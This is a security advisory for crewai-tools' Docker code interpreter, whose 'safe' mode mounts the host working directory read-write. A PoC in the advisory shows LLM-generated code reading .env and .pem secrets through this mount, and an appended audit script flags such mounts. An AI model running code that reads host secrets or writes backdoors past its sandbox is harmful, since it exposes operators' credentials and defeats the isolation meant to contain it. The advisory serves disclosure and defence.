Description
Advisory Details
- Package ecosystem: pip
- Package name: crewai-tools
- Affected versions: <= 0.36.1
- Patched versions: (none)
- Severity: Medium
- CWE: CWE-269 (Improper Privilege Management)
Summary
The "safe" Docker execution mode in crewai_tools/tools/code_interpreter_tool/code_interpreter_tool.py:271 mounts host CWD as /workspace with mode: "rw". LLM-generated code can read secrets (.env, SSH keys) and write backdoors to host files, defeating the isolation purpose of Docker execution.
Details
The Docker code interpreter tool is intended to provide sandboxed execution of LLM-generated code. However, it mounts the host's current working directory into the container with read-write access:
```python
# code_interpreter_tool.py:271
volumes={os.getcwd(): {"bind": "/workspace", "mode": "rw"}}
```

This means any code executed inside the "sandboxed" Docker container can:
- Read all files in the host CWD, including .env, SSH keys, credentials
- Write arbitrary files back to the host filesystem
- Modify existing source code to inject backdoors
PoC
```python
from crewai_tools import CodeInterpreterTool

tool = CodeInterpreterTool(unsafe_mode=False)  # "safe" Docker mode

# LLM-generated code reads host secrets
result = tool._run(code="""
import os
for f in os.listdir('/workspace'):
    if f.startswith('.env') or f.endswith('.pem'):
        with open(f'/workspace/{f}') as fh:
            print(f'=== {f} ===')
            print(fh.read())
""")
```

Impact
Any application using CrewAI's Docker code interpreter in its default configuration exposes the host working directory to LLM-generated code. This defeats the stated security purpose of Docker isolation and enables data exfiltration and host file manipulation.
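As an added example (not code from crewai-tools), the mount shape quoted above beside a hardened alternative, plus a small audit function that flags any docker-py volume bind exposing the host CWD or home directory; `scratch_volume_spec` and `audit_volume_spec` are names assumed here, not part of the project.

```python
"""Mount-policy check for a docker-py `volumes=` spec (added example, not crewai-tools code)."""
import os
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

def cwd_rw_volume_spec() -> dict:
    """The mount shape quoted in the advisory (crewai-tools <= 0.36.1): host CWD, read-write."""
    return {os.getcwd(): {"bind": "/workspace", "mode": "rw"}}

def scratch_volume_spec(mode: str = "rw") -> Tuple[dict, str]:
    """Hardened alternative (assumption): a fresh, empty scratch directory instead of the
    host CWD, so the container can neither read host secrets nor touch host source files.
    Whatever the code writes lands in the scratch dir, which the host can inspect and discard."""
    scratch = tempfile.mkdtemp(prefix="sandbox-")
    return {scratch: {"bind": "/workspace", "mode": mode}}, scratch

def audit_volume_spec(spec: dict, cwd: Optional[str] = None, home: Optional[str] = None) -> List[str]:
    """Return findings for binds that expose the host CWD, the home directory, or an
    ancestor of either (binding an ancestor exposes everything beneath it)."""
    sensitive = [Path(cwd or os.getcwd()).resolve()]
    home = home or os.path.expanduser("~")
    if home != "~":  # expanduser leaves "~" unchanged when no home directory is known
        sensitive.append(Path(home).resolve())
    findings = []
    for host, opts in spec.items():
        host_p = Path(host).resolve()
        mode = opts.get("mode", "rw")  # docker-py treats a missing mode as read-write
        if any(host_p == s or host_p in s.parents for s in sensitive):
            what = "readable and writable" if mode == "rw" else "readable"
            findings.append(f"{host} -> {opts['bind']}: host CWD/home {what} from the container")
    return findings

if __name__ == "__main__":
    for finding in audit_volume_spec(cwd_rw_volume_spec()):
        print("FINDING:", finding)
    hardened, scratch = scratch_volume_spec()
    print("hardened spec findings:", audit_volume_spec(hardened))
    os.rmdir(scratch)
```

Running the audit against the spec an application actually passes to `containers.run()` is a cheap pre-deployment check; a read-only bind of the CWD still reports a finding, since the secrets-reading half of the issue remains.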